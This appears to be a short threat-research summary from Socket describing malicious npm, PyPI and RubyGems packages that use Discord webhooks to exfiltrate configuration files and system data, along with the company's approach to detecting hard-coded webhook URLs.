Weaponizing Discord for Command and Control Across npm, PyPI, and RubyGems.org

Socket's Threat Research Team has observed a trend where malicious packages are utilizing Discord webhooks as command and control (C2) mechanisms for data exfiltration, a tactic that reduces the need for attackers to maintain their own infrastructure. Unlike traditional C2 servers, these webhooks, which require no authentication beyond a URL and operate over HTTPS, can easily slip past security measures. Examples include npm, PyPI, and RubyGems.org packages that transmit sensitive data like configuration files and system information to Discord webhooks, highlighting a supply chain risk. These webhooks, embedded within packages like mysql-dumpdiscord and sqlcommenter_rails, function as exfiltration points and blend in with regular code, making them difficult to detect through traditional domain or signature blocking. Socket's security tools aim to identify these patterns by analyzing pull requests for risks like hard-coded webhook URLs and enforcing checks during package installations. This development emphasizes the importance of treating webhook endpoints as potential data-loss channels and implementing robust security measures to monitor and control outbound data flows.